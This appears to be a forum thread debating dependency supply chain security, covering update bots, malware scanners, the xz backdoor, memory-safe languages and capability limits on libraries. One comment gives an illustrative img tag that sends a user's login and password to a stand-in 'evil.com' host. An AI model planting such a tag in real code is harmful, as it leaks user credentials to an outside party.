I work in a large org and we have multiple dependency update bot things. These are driven by compliance dashboards and not by developer demand. You can not argue against them as they are part of a larger compliance theater and if they have gaps people will simply buy more of these. Software Engineering never was a great craft, but it is getting worse these days :-(
Nowadays everything that is being published gets automatically scanned. That's why these supply chain attacks get reported in a matter of hours. For this reason you want to have quarantine options and not pick up newest releases for few days.
Also the most severe supply attack, which could have compromised ssh in a lot of systems was near successful - because there is no central place for C dependencies, there are just vendored copies and downloads from random places, archaic toolchains glued together with a shell script, which make it relatively easy to put malware and it not be automatically detected.
Then the languages that have a lot of friction - e.g. where monkey patching is not possible, package managers enforce clear higher-level structure, unsafe blocks are easily identifiable, types enforce structural integrity have a huge advantage. Making sneaky malware in them is just much more noisy and out of place that Slopuses have easy time noticing it.
All in all I expect turbulence in near term, but security to actually increase in the mid to long term.
I'm skeptical of such automated scanning efforts, they feel like enumerating badness. You just won't ever be able to detect all the possible kinds of malicious code.
What's perfectly benign in one context can be malicious in another. For example, my email client has legitimate reasons for accessing my GPG key, and it also obviously has a lot of code for communicating with the outside world. Good luck automatically detecting a patch that wires these two up! LLMs are presumably decent at this, but they're not going to be perfect.
Not every backdoor has to be super obvious either; I think The Underhanded C Contest was a good example of that. Sure, you can use high-level, memory safe languages to make it much harder to introduce a good bugdoor, but it's never going to be impossible. How many bugs have been hidden in our software for decades without being found?
This is not to say that these automated scanners aren't at the very least pragmatic - they do catch a lot of bad stuff, and there's obviously a lot of value in increasing the cost of an attack - but this also feels distracting from the core problem. We shouldn't be trusting so much random code. Full stop. There are dependencies you can't avoid trusting with a lot of access[1], but e.g. liblzma shouldn't have access to anything besides the data it's (de)compressing, should it?
I wish our industry focused more on research in this area - think CHERI and such.
[1] and automated scanning is especially helpful here!
I agree about other defenses (and here is a good time to expound the virtues of wasm), and that scanners are never going to be perfect, but in many cases the signal they're picking up on is not just "this code is bad". For example, you can detect that a release contains code which is not present in the source repository. For projects for which that approach is viable (releases built only from published source, maintainers aren't regularly unilaterally pushing directly to main) this is an extremely effective defense. It doesn't protect against a malicious maintainer, as in the xz case, but it does catch many other kinds of compromise regardless of how subtle the malicious code is.
I'm skeptical of such automated scanning efforts
I'm not. It's and will even more be extremely effective. Just see a today's fresh submission: https://lobste.rs/s/lh9rmv/claude_code_found_linux_vulnerability I just happened to read.
While the Slopuses have a much easier job reviewing new release of a relatively mature dependency, and they can take a diff and focus on a typically tiny amount of changes that were made, making it very easy to raise any concerns with good accuracy.
For example, my email client has legitimate reasons for accessing my GPG key
I'm not going to have a dependency on a whole email client, which this post is about.
I'm going to have a dependency on a IMAP protocol crate, and maybe a GUI library, etc. etc.
Not every backdoor has to be super obvious either; I think The Underhanded C Contest
That's why no one should be using C and other memory unsafe languages like it anymore. Languages that allow spooky obfuscated behavior, and have unstructured tooling that allows (and make it common to do it) them arbitrary code access, etc. are now an absolute no-no.
And really, as the above link points to, LLMs can see through hard to reason about obfuscated code better than human can.
but it's never going to be impossible
It never was impossible. But my point is that security of dependency supply chains is actually improving and going to actually improve even more.
We shouldn't be trusting so much random code.
But people don't pull in random dependencies for lols. They use dependencies for reasons. All this talk about not having dependencies is usually voiced by C and alikes developers who's software in practice can't parse command line arguments properly, and is fully of ad-hoc half broken protocols and parsers because they can't use a proper mature library to do the same thing, so they pretend their ad-hoc code and vendored unpatched copy-pasted code is sooo much more secure, because no one ever cares to look at it, while the central software repositories get scanned and reported immediately.
liblzma shouldn't have access to anything besides the data it's (de)compressing, should it?
Sure. Can't be guaranteed in an memory unsafe langauge like C though. And liblzma's malicious code was actually sneaked in by autotools scripts because the whole tooling is insanely primitive.
The same stuff could not possibly happen in Rust because it would stand out like an elephant, glaringly obvious to any human or LLM looking at it.
Both my email client and Underhanded C were just examples. (Actually, I wonder how many of the entries you could port to Rust and such - not all of them rely on memory unsafety etc).
An IMAP library doesn't really have much reason to access the filesystem, mess with running processes, [etc] either. Maybe it shouldn't even be able to create any new sockets? It's not a dependency you pulled in for the lols, but that doesn't mean it should have access to absolutely everything out there.
[liblzma's behaviour can't] be guaranteed in an memory unsafe langauge like C though.
There's a reason why I mentioned CHERI :) I absolutely agree with autoconf being awful and a great way to sneak in malicious code, but I don't really think it was essential to the attack. It would've been much harder for Jia Tan to hide the backdoor if xz was a Rust project, but it wouldn't be impossible. I don't want my line of defense against supply chain attacks to be "It's hard to figure out how to smuggle a hidden backdoor into Rust code". I want to prevent my dependencies from doing things they're not supposed to do in the first place.
It's not like this would prevent all possible attacks - no matter what you do, a malicious IMAP library could still e.g. leak my login credentials by inserting an <img src="//evil.com/$user/$pass"> into a HTML message, but at least it won't be able to access the filesystem and steal my private keys or such. That's a hard guarantee. I don't have to hope that a scanner will catch it, it's just fundamentally impossible. I find that there's a concerning lack of such hard guarantees in modern systems.
It’s not every dependency you add that’s a problem; it’s every dependency you update
Something that baffles me is that I've been burned many times by updates but never by a supply chain attack or security vulnerability that needs to be patched. Updates are a bigger threat to the stability of my machines than malware.
I don't know if my experience is unique but this is why I never update dependencies unless they fix bugs or problems in my usage of them.
You are definitely not alone. Every dependency update is a source of fear. I tend to build systems from small, self contained parts (some people might call them microservices) and one of the top reasons is to enable dependencies to be managed independently on an as-needed basis.
As a practitioner of infosec the old adage of automatic updates and auto dependency management has been turned on it's head. The article doors have a cogent point complexity is the enemy of security
Don't be like Ubuntu, be like Debian.
Which means try not to chaise the latest version of every package. Shut your dependabot down. Vendor and vet key deps.
P. S. I love Ubuntu and all they've done for the community.
That's a good analogy. Ubuntu has a bigger attack surface area because it has more stuff. But moving to Debian isn't 1:1 because I got rid of stuff. So, that shows the trade off pretty well.
I agree with the article that the update is the attack surface area in regards to recent news. Vendoring and vetting key deps still has a gap: who is doing the vetting and when? What does vetting look like? Reading the code? How do you read the code for the xz hack? If the code is hidden and the xz hack was notable because of the web of trust compromise, do I have to expand this out to social or a trust audit? Who do you, me, we trust?
If I have this problem with dev software, doesn't it apply to all software distribution? I like dependabot as an idea. It opens a request. It doesn't merge. You don't have to merge it. I like the dependabot is reacting to signal and events (CVEs). In general, I don't like timers that aren't actually related to time. I think it's a fallback. CVEs are signal. It's also trust and crowdsourcing.
Imagine you did a bit of vetting on a library and you found something terrible. I would appreciate it you shared that. You could contact the vendor or a central place and get an identifier for what you found. Then you get an identifier and we can refer to it by name and link. Then we can make recommendations for a fix, etc.
I'm curious to see where people go with this, if we over-correct. Maybe we need to advertise our current systems and describe what problems they solve.
Correct. Which is why libraries should be restrictable on their capabilities on the language level. In fact, every function call should be restrictable. Most libraries only need to do pure computations anyways. No need for them to do any kind of IO.
While I agree on keeping depencies low as much as you can, I disagree on dependentbots.
Set it up with a cool down period and remove the automatic approve. Have the dependentbot PR and merge after review.
For the Node.js affectionate, have save-exact=true on your npmrc against the automatic update on install...
That is... If by 'dependency' you mean blindly pull whatever some remote URL that you don't control sends you, trust it, compile it and run it without reviewing it. Then yes, of course. Don't we know this from the get go?
This has always been a huge security nightmare, by virtue of its very concept.
You can download a dependency, review it and include it safely in your project. This has been done for half a century and its how you should build stable serious software.
It's not dependencies that are a problem. What's problematic is pulling them and using them without checking.
Automated updates should not be a thing. If an old version has a nasty security vulnerability, send out a warning to anyone using it instead of forcing them on a newer version.
Sure, most people will just update without auditing the code, but it gives us a chance to catch the attack. Take the xz affair: if it had automatic updates, every Linux/BSD box would instantly be compromised. It's only because of the delay introduced by manual updating that it was caught.
Even if no malice is involved, updating libraries breaks stuff. It's the reason software breaks randomly. Code written in a mature and rarely changed environment (like POSIX C) largely just works 30 years later. Code written in python or node breaks within months.
The thing is, modern package managers (and static linking) allow using a different version for each program. Getting rid of auto updates would fix both supply chain attacks and bit rot.